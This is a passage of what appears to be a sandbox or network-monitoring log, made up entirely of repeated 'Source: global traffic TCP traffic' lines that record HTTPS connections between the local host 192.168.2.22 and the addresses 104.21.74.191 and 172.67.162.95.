      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
